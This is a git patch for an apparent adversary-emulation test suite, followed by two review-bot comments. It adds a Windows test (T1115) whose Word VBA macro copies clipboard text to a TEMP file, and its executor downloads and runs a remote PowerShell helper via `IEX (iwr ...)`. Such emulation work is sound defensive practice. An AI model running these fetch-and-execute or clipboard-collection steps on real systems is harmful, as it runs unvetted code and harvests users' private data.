From 5f208eec00ddb74becb66b6649e821cd5a710db9 Mon Sep 17 00:00:00 2001
From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com>
Date: Thu, 10 Dec 2020 12:03:22 -0500
Subject: [PATCH] Clipboardvba (#1321)

* initial push for T1115 (Collect Clipboard Data via VBA)
* update to registry check
* updates
* updates
* updates
Co-authored-by: avocado
Co-authored-by: Carrie Roberts
---
 atomics/T1115/T1115.yaml | 33 ++++++++++++++++++++++++++-
 atomics/T1115/src/T1115-macrocode.txt | 15 ++++++++++++
 2 files changed, 47 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1115/src/T1115-macrocode.txt
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml
index 94e940a4..dce7f02a 100644
--- a/atomics/T1115/T1115.yaml
+++ b/atomics/T1115/T1115.yaml
@@ -36,4 +36,35 @@ atomic_tests:
 echo ifconfig | pbcopy
 $(pbpaste)
 name: bash
-
+- name: Collect Clipboard Data via VBA
+ auto_generated_guid:
+ description: |
+ This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Microsoft #{ms_product} must be installed
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: |
+ Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+ executor:
+ command: |
+ Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
+ cleanup_command: |
+ Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
+ name: powershell
diff --git a/atomics/T1115/src/T1115-macrocode.txt b/atomics/T1115/src/T1115-macrocode.txt
new file mode 100644
index 00000000..879faa5e
--- /dev/null
+++ b/atomics/T1115/src/T1115-macrocode.txt
@@ -0,0 +1,15 @@
+Sub GetClipboard()
+
+ outFile = Environ("TEMP") + "\atomic_T1115_clipboard_data.txt"
+ Set fs = CreateObject("Scripting.FileSystemObject")
+ Set out = fs.CreateTextFile(outFile, True)
+
+ With CreateObject("new:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
+ .GetFromClipboard
+ S = .GetText
+ End With
+
+ out.WriteLine (S)
+ out.Close
+
+End Sub
\ No newline at end of file
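Review bot: The executor hard-codes `-officeProduct "Word"` while the dependency block and input_arguments key everything off `#{ms_product}`, so overriding the argument would check for one product and run the macro in another; the Invoke-Maldoc line should read `-officeProduct "#{ms_product}"` (or the argument should be dropped, since the description already fixes the product to Word). The prereq_command ends every running `winword` (or `#{ms_product}`) process with `Stop-Process -Name $process`, not just the COM instance it started, which can discard a tester's open documents; keeping the object and closing only it, e.g. `$app = New-Object -COMObject "#{ms_product}.Application"; $app.Quit()`, limits the check to its own instance. `IEX (iwr "...master/Public/Invoke-MalDoc.ps1")` downloads and runs a helper from a mutable branch with no pinning or hash check, so the test's behaviour can change under reviewers without any change to this repository; pinning the URL to a commit (placeholder `<COMMIT_SHA>`) or shipping the helper with the atomics folder keeps it reproducible and auditable. `auto_generated_guid:` is left empty; presumably the repository tooling fills it, but that is worth confirming before merge.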
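Review bot: `Set out = fs.CreateTextFile(outFile, True)` runs before the clipboard is read, so if `.GetText` raises a run-time error (the MSForms DataObject can do so when the clipboard holds no text format) the macro aborts leaving an empty atomic_T1115_clipboard_data.txt that is never closed; moving the `With CreateObject(...) ... End With` block ahead of the `CreateTextFile` call, or wrapping the read in `On Error` handling that still reaches `out.Close`, avoids the half-written artifact. `Option Explicit` is absent, so `outFile`, `fs`, `out` and `S` are implicit Variants; declaring them with `Dim` (`Dim outFile As String`, `Dim fs As Object`, `Dim out As Object`) catches typos at compile time. `out.WriteLine (S)` wraps the single argument in parentheses on a method called without `Call`, which is harmless here but non-idiomatic; the conventional form is `out.WriteLine S`. A header comment such as `' Atomic T1115: write the current clipboard text to %TEMP%\atomic_T1115_clipboard_data.txt` would let reviewers map the macro back to the YAML test that invokes it.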